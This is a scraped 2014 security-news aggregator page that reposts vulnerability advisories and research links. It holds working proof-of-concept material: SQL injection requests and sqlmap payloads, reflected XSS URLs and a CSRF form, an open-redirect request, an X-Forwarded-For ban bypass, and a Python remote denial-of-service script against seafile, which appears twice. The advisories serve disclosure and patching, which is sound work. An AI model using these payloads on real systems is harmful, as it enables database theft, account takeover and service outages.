Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

[Quantum Leap Advisory] #QLA140808 Cart Engine 3.0 Multiple vulnerabilities - SQL Injection, XSS Reflected, Open Redirect

September 16, 2014, 12:54 pm
$
0
0
=== Details ===
Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/
Affected Product: Cart Engine
Version: 3.0

=== Executive Summary ===

SQL Injection: Using a specially crafted HTTP request, it is possible to exploit
a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters
of cart.php page. Successful exploitation of the vulnerabilities results in read
sensitive data from the database and, in some cases, execute administration
operation on the database or issue commands to the operating system.

Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit
a lack in the neutralization[2] of multiple pages output which includes the user
submitted content. Successful exploitation of the vulnerabilities, results in
the execution of arbitrary HTML and script code in the user’s browser in the context of
the victim user's session trough a “Reflected XSS”.

Open Redirect: Using a specially crafted HTTP request, it is possible to
redirect[3] the normal browsing of users to a malicious site by modifying
untrusted URL input in Referer HTTP header parameter in index.php, cart.php,
msg.php and page.php pages. Successful exploitation of the vulnerabilities
results in phishing scam, user credential theft, malware dissemination.

=== Proof of Concept ===

= SQL Injection (based on MySQL) =

A SQL Injection vulnerability has been detected on cart.php page in Cart Engine
CMS. The function “sql_query” in file “cart.php” doesn’t sanitize the “$item_id”
parameter, so error based and boolean-based blind or time-based blind SQL
Injection attacks can be executed.


## HTTP REQUEST - injection on item_id[0] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=8
Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347
Content-Length: 774

-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="AXSRF_token"


-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="cmd"

add
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="item_id[0]"

8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------109606523931762158449252347--
## EOF HTTP REQUEST ##

## HTTP REQUEST - injection on item_id[] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=13
Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1948855485207142787318084006
Content-Length: 2353

-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="AXSRF_token"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="cmd"

add
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[0]"

13
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_3"

3
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_12"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"

' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006--
## EOF HTTP REQUEST ##

= Reflected XSS =

A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine
CMS. In the file "skins/default/outline.tpl", the parameter "path" in section
"drop down TOP menu (with path)" and the parameter "$print_this_page" in section
"footer_content_block" are not sanitized, so an XSS attack can be executed on
multiple pages.

## HTTP REQUESTS ##
/index.php?"><script>alert('XSS')<%2fscript>
/index.php?'%3balert('XSS')%2f%2f
/checkout.php?%27%3balert%28%27XSS%27%29%2f%2f
/checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/contact.php?"><script>alert('XSS')<%2fscript>
/contact.php?'%3balert('XSS')%2f%2f
/detail.php?item_id=10&'%3balert('XSS')%2f%2f
/detail.php?item_id=10&"><script>alert('XSS')<%2fscript>
/distro.php?'%3balert('XSS')%2f%2f
/distro.php?"><script>alert('XSS')<%2fscript>
/newsletter.php?'%3balert('XSS')%2f%2f
/newsletter.php?"><script>alert('XSS')<%2fscript>
/page.php?pid=2&"><script>alert('XSS')<%2fscript>
/page.php?pid=2&'%3balert('XSS')%2f%2f
/profile.php?"><script>alert('XSS')<%2fscript>
/profile.php?'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&"><script>alert('XSS')<%2fscript>
/sitemap.php?'%3balert('XSS')%2f%2f
/sitemap.php?"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&'%3balert('XSS')%2f%2f
/tell.php?'%3balert('XSS')%2f%2f
/tell.php?"><script>alert('XSS')<%2fscript>
## EOF HTTP REQUEST ##

= Open Redirect =

An Open Redirect vulnerability has been detected on multiple pages in Cart
Engine CMS. The function "redir" in file "includes/function.php" doesn't check
the "$_SERVER['HTTP_REFERER']" parameter, so an Open Redirect attack can be
executed.

## HTTP REQUEST ##
GET /page.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=
Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6
Connection: close


$ cat openredirect.req | nc -vvv eshop.hacme.hac 80
hacme.hac [10.0.2.80] 80 (http) open
HTTP/1.1 302 Found
Date: Sun, 10 Aug 2014 15:16:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.google.com/search?hl=en&q=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

 sent 403, rcvd 380

=== Solution ===

Upgrade to Cart Engine 4.0.

=== Disclosure Timeline ===

2014-08-08 – Vulnerability Discovered
2014-08-10 – Initial vendor notification
2014-08-20 – The vendor fixed the vulnerability
2014-09-15 – Public advisory

=== References ===

[1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
[2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
[3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
Search

Laravel 2.1 Hash::make() bcrypt truncation

September 16, 2014, 12:56 pm
$
0
0
######################################################################
#  _     ___  _   _  ____  ____    _  _____
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| |     / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# Laravel 2.1 Hash::make() bcrypt truncation
# Website : http://laravel.com/
# Author : @u0x (Pichaya Morimoto)
# Release dates : September 16, 2014
#
# Special Thanks to 2600 Thailand group
https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################

[+] Laravel
============================================================
Laravel is a free, open source PHP web application framework, designed for
the development of model–view–controller (MVC) web applications. According
to a December 2013 developers survey on PHP frameworks popularity, Laravel
is listed as the most popular PHP framework in 2013. At the same time, as
of August 2014 Laravel is the most popular and watched PHP project on
GitHub.
https://en.wikipedia.org/wiki/Laravel

[+] Description
============================================================
By using Laravel Security mechanism,
http://laravel.com/docs/security#storing-passwords
The passwords will be hashed using Laravel's Hash::make() function.
This function internally call PHP 's password_hash() without checking the
length.

Why do we need to check length? as PHP manual said,
"Using the PASSWORD_BCRYPT for the algo parameter,
will result in the password parameter being truncated
to a maximum length of 72 characters."
http://php.net/manual/en/function.password-hash.php

The problem occurs if users enter password longer than 72 characters
then the password will be truncated to be 72 characters.

This will result in pseudo hash collision.

[+] Proof-of-Concept
============================================================
// user input password
$input = str_repeat('A',72);
// plaintext password
$pass1 =
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.'mysupersecretpassword';
$pass2 =
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.'longcatishere';
// hashed password
$hash1 = Hash::make($pass1);
$hash2 = Hash::make($pass2);
// match?
$status1 = Hash::check($input, $hash1)?'Yes':'No';
$status2 = Hash::check($input, $hash2)?'Yes':'No';

User 1
Desc. Value
$input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$pass1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmysupersecretpassword
Hash::make($pass1)
$2y$10$9oMcpTwHgTzR5ZUMqlnMMOx/P18QZ5e9054lq.pwxw1O9urX3JHHu
Hash::check($input, $hash1) Yes

User 2
Desc. Value
$input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$pass2
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlongcatishere
Hash::make($pass2)
$2y$10$W7wwB4nLmFjrenJGmx1uauqhjzikZNZA0qzxH8wkbiSmVatCYrAUm
Hash::check($input, $hash2) Yes

[+] Vulnerable Code
============================================================
/vendor/laravel/framework/src/Illuminate/Hashing/BcryptHasher.php

...
public function make($value, array $options = array())
{
...
$hash = password_hash($value, PASSWORD_BCRYPT, array('cost' => $cost));
...
return $hash;

[+] How to fix this?
============================================================
In Django project, they solved this problem by applying SHA256 before using
bcrypt
"BCryptSHA256PasswordHasher fixes this by first hashing the password using
sha256.
This prevents the password truncation"
https://docs.djangoproject.com/en/dev/topics/auth/passwords/#using-bcrypt-with-django



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Microsoft Windows 8.1 Kernel Patch Protection Analysis & Attack Vectors

September 17, 2014, 3:08 am
$
0
0
Kernel Patch Protection (also known as "patchguard") is a Windows mechanism designed to
control the integrity of vital code and data structures used by the operating system. It was
introduced in Windows 2003 x64 and has been constantly improved in further Windows
versions. In this article we present a descriptive analysis of the patchguard for the latest
Windows 8.1 x64 OS, and primarily focus on patchguard initialization and attack vectors related
to it.

more here..........http://blog.ptsecurity.com/2014/09/microsoft-windows-81-kernel-patch.html

Pirates of the Internetz: The curse of the waterhole

September 17, 2014, 3:11 am
$
0
0
Last week the Bromium Labs team was contacted by a Fortune 1000 customer that detected an interesting attack via one of their installed LAVA sensors. We get such events frequently from our customers; however this attack was a bit different. The attack was a classic waterhole attack targeting potential viewers of a technology startup in the Oil and Gas sector. Interestingly, this attack occurred days after the company announced a sizable funding grant. It’s likely that the attackers were expecting more traffic to the website and hoped to increase their chances of a successful infection.

more here............http://labs.bromium.com/2014/09/16/pirates-of-the-internetz-the-curse-of-the-waterhole/

Paper: The Dark Alleys of Madison Avenue: Understanding Malicious Advertisements

September 17, 2014, 3:18 am
$
0
0
Online advertising drives the economy of the World Wide
Web. Modern websites of any size and popularity include
advertisements to monetize visits from their users. To this
end, they assign an area of their web page to an advertising
company (so called ad exchange) that will use it to display
promotional content. By doing this, the website owner
implicitly  trusts that the advertising company will offer legitimate
content and it will not put the site’s visitors at risk of
falling victims of malware campaigns and other scams.
In this paper, we perform the first large-scale study of
the safety of the advertisements that are encountered by
the users on the Web. In particular, we analyze to what
extent users are exposed to malicious content through
advertisements, and investigate what are the sources of this
malicious content. Additionally, we show that some ad
exchanges are more prone to serving malicious advertisements
than others, probably due to their deficient filtering mechanisms.
The observations that we make in this paper shed
light on a little studied, yet important, aspect of advertisement
networks, and can help both advertisement networks
and website owners in securing their web pages and in keeping
their visitors safe.


more here...........http://www.ei.rub.de/media/emma/veroeffentlichungen/2014/09/02/paper.pdf

SpyFiles 4 -WikiLeaks publicly disclosed copies of FinFisher surveillance software

September 17, 2014, 7:22 am
$
0
0
Today, 15 September 2014, WikiLeaks releases previously unseen copies of weaponised German surveillance malware used by intelligence agencies around the world to spy on journalists, political dissidents and others.

FinFisher (formerly part of the UK based Gamma Group International until late 2013) is a German company that produces and sells computer intrusion systems, software exploits and remote monitoring systems that are capable of intercepting communications and data from OS X, Windows and Linux computers as well as Android, iOS, BlackBerry, Symbian and Windows Mobile devices. FinFisher first came to public attention in December 2011 when WikiLeaks published documents detailing their products and business in the first SpyFiles release.

more here.............https://wikileaks.org/spyfiles4/


Reflected XSS in WooCommerce – excelling eCommerce allows attackers ability to do almost anything an admin user can do (WordPress plugin)

September 17, 2014, 4:28 am
$
0
0
Details
================
Software: WooCommerce - excelling eCommerce
Version: 2.1.12
Homepage: http://wordpress.org/plugins/woocommerce/
Advisory report: https://security.dxw.com/advisories/reflected-xss-in-woocommerce-excelling-ecommerce-allows-attackers-ability-to-do-almost-anything-an-admin-user-can-do/
CVE: Awaiting assignment
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)

Description
================
Reflected XSS in WooCommerce – excelling eCommerce allows attackers ability to do almost anything an admin user can do

Vulnerability
================
An attacker able to convince a logged-in admin user to visit a link of their choosing (for instance via spearphishing) can execute arbitrary JavaScript within the admin’s browser which could cause it to delete all posts, create new admin users, or leverage other functionality accessible only to admins.

Proof of concept
================
If a logged-in administrator visits the following url, a javascript alert will display on in the admin screen:
http://localhost/wp-admin/admin.php?page=wc-reports&range=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Note that this will not work in a browser with reflected XSS prevention (e.g. Google Chrome)

Mitigations
================
Upgrade to version 2.2.3 or later

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2014-08-28: Discovered
2014-09-15: Reported to Vendor by email
2014-09-15: Requested CVE
2014-09-16: Vendor responded
2014-09-16: Fixed version released
2014-09-17: Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

CSRF/XSS vulnerablity in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do (WordPress plugin)

September 17, 2014, 4:29 am
$
0
0
Details
================
Software: Login Widget With Shortcode
Version: 3.1.1
Homepage: http://wordpress.org/plugins/login-sidebar-widget/
Advisory report: https://security.dxw.com/advisories/csrfxss-vulnerablity-in-login-widget-with-shortcode-allows-unauthenticated-attackers-to-do-anything-an-admin-can-do/
CVE: Awaiting assignment
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)

Description
================
CSRF/XSS vulnerablity in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do

Vulnerability
================
This plugin is vulnerable to a combination CSRF/XSS attack. An attacker able to convince an admin to visit a link of their choosing is able to insert arbitrary HTML into an admin page.  Using that ability they can use JavaScript to control an admin user’s browser, allowing the attacker to create user accounts, create posts, delete all posts, etc.

Proof of concept
================
If a logged-in administrator user clicks the submit button on this form, a javascript alert will display in the admin screens. (In a real attack the form can be made to auto-submit using Javascript).
<form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=login_widget_afo\">
  <input type=\"text\" name=\"custom_style_afo\" value=\"&lt;/textarea>&lt;script>alert(1)&lt;/script>\">
  <input type=\"text\" name=\"option\" value=\"login_widget_afo_save_settings\">
  <input type=\"submit\">
</form>

Mitigations
================
Upgrade to version 3.2.1 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2014-08-26: Discovered
2014-09-15: Reported to vendor by email
2014-09-15: Vendor reported the issue fixed and a new version released
2014-09-17: Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
Search

SiteKiosk - Breakout

September 17, 2014, 5:45 am
$
0
0
It has been a while since my last blog post, therefore I am going to share two possible bypasses for the software SiteKiosk on Windows. As the name suggests, it is a kiosk software ^^.
SiteKiosk is a software from Provision GmbH. It claims to have more than 250.000 installations world wide, which would make it to one of the most used software in the "Public Access Terminal Software" category.
It has a lot of features, but my only goal was to break out of the sandbox and start an external application.
In the end my findings produced a new beef modules.

more here............http://insert-script.blogspot.co.at/2014/09/sitekiosk-breakout.html

[TECHNICAL TEAR DOWN] FIESTA EXPLOIT KIT – JAVA EXPLOIT (CVE-2012-0507)

September 17, 2014, 5:46 am
$
0
0
Today, we’re going to look at another exploit that is delivered by the Fiesta Exploit Kit. As usual, the purpose of this post is to provide a technical understanding on how the exploit work. This time it is a JAVA exploit.

more here................http://www.vxsecurity.sg/2014/09/17/technical-tear-down-fiesta-exploit-kit-java-exploit-cve-2012-0507/

Vulnerability in WP-Ban allows visitors to bypass the IP blacklist in some configurations (WordPress plugin)

September 17, 2014, 7:18 am
$
0
0
Details
================
Software: WP-Ban
Version: 1.62
Homepage: http://wordpress.org/plugins/wp-ban/
Advisory report: https://security.dxw.com/advisories/vulnerability-in-wp-ban-allows-visitors-to-bypass-the-ip-blacklist-in-some-configurations/
CVE: CVE-2014-6230
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description
================
Vulnerability in WP-Ban allows visitors to bypass the IP blacklist in some configurations

Vulnerability
================
This plugin allows blacklisting users based on their IP address, however it takes the IP address from the X-Forwarded-For header if available.
Not all Web server configurations will strip or replace X-Forwarded-For headers – in which case the IP ban can be bypassed by sending this header. This plugin therefore only works in certain configurations, but does not warn admins of this fact.

Proof of concept
================

Visit http://localhost/wp-admin/admin.php?page=wp-ban/ban-options.php
Set “Banned IPs” to “127.0.0.1″
Execute “curl http://localhost/\" and see the “You Are Banned” message
Execute “curl http://localhost/ -H \'X-Forwarded-For: 999.999.999.999\'\" and see that it displays the page

Note that this will not work if your Web server sets or strips X-Forwarded-For headers.
(To remove the IP blacklist run this SQL: “delete from wp_options where option_name=\'banned_ips\';\")

Mitigations
================
Upgrade to version 1.6.4 or later.
If a reverse-proxy is used, check the “I am using a reverse proxy” box in the plugin settings, and ensure that X-Forwarded-For headers are being set even if the request already contains an X-Forwarded-For header.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2014-08-27: Discovered
2014-09-04: Reported to vendor by email
2014-09-04: Requested CVE
2014-09-04: Vendor responded
2014-09-17: Vendor reported a fixed version released
2014-09-17: Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

Salesforce Dyre Variant – Research & Analysis

September 17, 2014, 7:20 am
$
0
0
Hi, I’m Tomer Schwartz, director of security research at Adallom Labs. As you probably know by now, a bit over a week ago, Salesforce.com announced they detected a new variant of Dyre (aka Dyreza) that was targeting Salesforce user credentials. Since many of our customers rely on us to secure their users and data inside of Salesforce.com, we were inundated with questions about the ramifications and intent of the malware. We’ve spent the last week trying to take a closer look at the Dyre malware variant that Salesforce.com pointed us to in order to provide actionable information to our customers, and I wanted to share our results in this post in case the rest of you are curious (there’s some important stuff inside, but not what you might expect). First, let’s start off with an intro to Dyre

more here................http://www.adallom.com/blog/salesforce-dyre-variant-research-analysis/

UFONet

September 17, 2014, 10:35 am
$
0
0
UFONet - is a shell client designed to launch DDoS attacks against a target, using CSRF/XSS vectors on third party web applications, like botnet. It allows to use a proxy to manage 'zombies'.

more here..........https://github.com/epsylon/ufonet

THC-SmartBrute

September 17, 2014, 11:02 am
$
0
0
Finds undocumented and secret commands implemented in a smartcard

more here...............https://www.thc.org/thc-smartbrute/

Multiple SQL Injection Vulnerabilities in ClassApps SelectSurvey.net

September 17, 2014, 11:36 am
$
0
0
Details
==========
Software: ClassApps SelectSurvey.net
Description: Multiple SQL Injection Vulnerabilities
Version: 4.124.004
Homepage: https://www.classapps.com/SelectSurveyNETOverview.asp
Vendor Fix: 4.125.002
CVE: 2014-6030

Timeline
==========
Aug 28 2014 - Vendor Notified
Aug 28 2014 - CVE Requested
Aug 28 2014 - Vendor Response
Sep 01 2014 - CVE Assigned
Sep 01 2014 - Upgraded Version Released
Sep 17 2014 - Disclosure

Description
==========
SelectSurvey.net is a web-based survey application written in ASP.net
and C#. It is vulnerable to multiple SQL injection attacks, both
authenticated and unauthenticated. The authenticated vulnerability
resides within the file upload script, as the parameters are not
sanitized prior to being placed into the SQL query. ClassApps had
previously listed 'SQL injection protection' as a feature and did have
several functions in place to attempt to prevent such attacks but due to
using a "blacklisting" approach, it is possible to circumvent these
functions. These functions are used elsewhere throughout the application
to protect GET request variables but are not sufficient. Only this
specific version of the application has been tested but it is highly
likely these vulnerabilities exist within prior versions. It has not
been confirmed that these vulnerabilities are fixed. The vendor stated
that they would be fixed in this new release however, they do not allow
download of the code unless you are a customer so fixes have not been
verified.

Examples
==========
/survey/ReviewReadOnlySurvey.aspx?ResponseID=<num>&SurveyID=[SQLi]
(unauthenticated)
/survey/UploadImagePopupToDb.aspx?ResponseID=<num>&SurveyID=[SQLi]
(authenticated)

sqlmap identified the following injection points:
---
Place: GET
Parameter: SurveyID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ResponseID=1&SurveyID=1' AND 4002=4002 AND 'dLur'='dLur

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ResponseID=1&SurveyID=1'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ResponseID=1&SurveyID=1' WAITFOR DELAY '0:0:5'--
---
[14:01:39] [INFO] testing Microsoft SQL Server
[14:01:39] [INFO] confirming Microsoft SQL Server
[14:01:39] [INFO] the back-end DBMS is Microsoft SQL Server
[14:01:39] [INFO] fetching banner
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS operating system: Windows 7 Service Pack 1
back-end DBMS: Microsoft SQL Server 2008
banner:
---
Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)
    Jun 28 2012 08:36:30
    Copyright (c) Microsoft Corporation
    Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601:
Service Pack 1)
---
Search

ccnet-server remote DoS (assert) seafile-server 3.1.5

September 17, 2014, 11:41 am
$
0
0
# Exploit Title: ccnet-server remote DoS (assert) in seafile-server  3.1.5
# Date: Sep 4, 2014
# Exploit Author: retset
# Vendor Homepage: seafile.com
# Software Link:
https://bitbucket.org/haiwen/seafile/downloads/seafile-server_3.1.4_win32.tar.gz
# Version: seafile-server 3.1.4
# Tested on: Windows 7/seafile-server 3.1.5

import socket
import sys


ip = sys.argv[1]
addr = (ip, 10001)
s = socket.create_connection(addr)

dos = '\x00\x04\x00\x00\x00\x00\x03\xe8'
dos += '\x00' * 1001

s.send(dos)
print repr(s.recv(1024))


s.close()


#@retset




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

DoS seafile-server 3.1.5 ( ccnet-server - assert)

September 17, 2014, 11:41 am
$
0
0
# Exploit Title: ccnet-server remote DoS (assert) in seafile-server  3.1.5
# Date: Sep 4, 2014
# Exploit Author: retset
# Vendor Homepage: seafile.com
# Software Link:
https://bitbucket.org/haiwen/seafile/downloads/seafile-server_3.1.4_win32.tar.gz
# Version: seafile-server 3.1.4  (mb <= 3.1.4)
# Tested on: Windows 7/seafile-server 3.1.5

import socket
import sys


ip = sys.argv[1]
addr = (ip, 10001)
s = socket.create_connection(addr)

dos = '\x00\x04\x00\x00\x00\x00\x03\
xe8'
dos += '\x00' * 1001

s.send(dos)
print repr(s.recv(1024))


s.close()


#@retset


//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Invisible.im

September 17, 2014, 11:45 am
$
0
0
Invisible.im is a coalition of security experts, developers, and a tech journalist that was established to develop an instant messenger and file transfer tool that leaves virtually no evidence of conversations or transfers having occurred. Invisible.im's goal is to create a messenger platform that generates no meaningful, third-party metadata.

more here...........http://invisible.im/

Paper: Exposing Bootkits with BIOS Emulation

September 18, 2014, 3:03 am
$
0
0
The security features added in modern 64-bit versions of Windows
raise the bar for kernel mode rootkits. The introduction of Driver Signa-
ture Enforcement prevents malware from loading an unsigned kernel mode
driver. PatchGuard was introduced to protect the integrity of the running
kernel, in order to prevent rootkits from modifying critical structures or
hooking system calls. Although time has shown that these security mea-
sures are not perfect, and may in fact be bypassed while actively running,
an alternative approach is to subvert the system by running code before
any of the security features kick in.

Secure Boot has been introduced to protect the integrity of the boot
process. However, the model only works when booting from signed firmware
(UEFI). Legacy BIOS systems are still vulnerable. The Master Boot
Record, Volume Boot Record, and the bootstrap code all reside in un-
signed sectors on disk, with no security features in place to protect them
from modification.

Using a combination of low level anti-rootkit techniques, emulation,
and heuristic detection logic, we have devised a way to detect anomalies
in the boot sectors for the purpose of detecting the presence of bootkits.

more here............https://www.blackhat.com/docs/us-14/materials/us-14-Haukli-Exposing-Bootkits-With-BIOS-Emulation-WP.pdf

Your iOS 8 Data is Not Beyond Law Enforcement’s Reach… Yet.

September 18, 2014, 3:06 am
$
0
0
In a recent announcement, Apple stated that they no longer unlock iOS (8) devices for law enforcement.

“On devices running iOS 8, your personal data such as photos, messages (including attachments), email, contacts, call history, iTunes content, notes, and reminders is placed under the protection of your passcode. Unlike our competitors, Apple cannot bypass your passcode and therefore cannot access this data. So it’s not technically feasible for us to respond to government warrants for the extraction of this data from devices in their possession running iOS 8.”

This is a significantly pro-privacy (and courageous) posture Apple is taking with their devices, and while about seven years late, is more than welcome. In fact, I am very impressed with Apple’s latest efforts to beef up security all around, including iOS 8 and iCloud’s new 2Fa. I believe Tim Cook to be genuine in his commitment to user privacy; perhaps I’m one of the few who can see just how gutsy this move with iOS 8 is.


more here.................http://www.zdziarski.com/blog/?p=3875
Viewing all 8064 articles
Browse latest View live
Search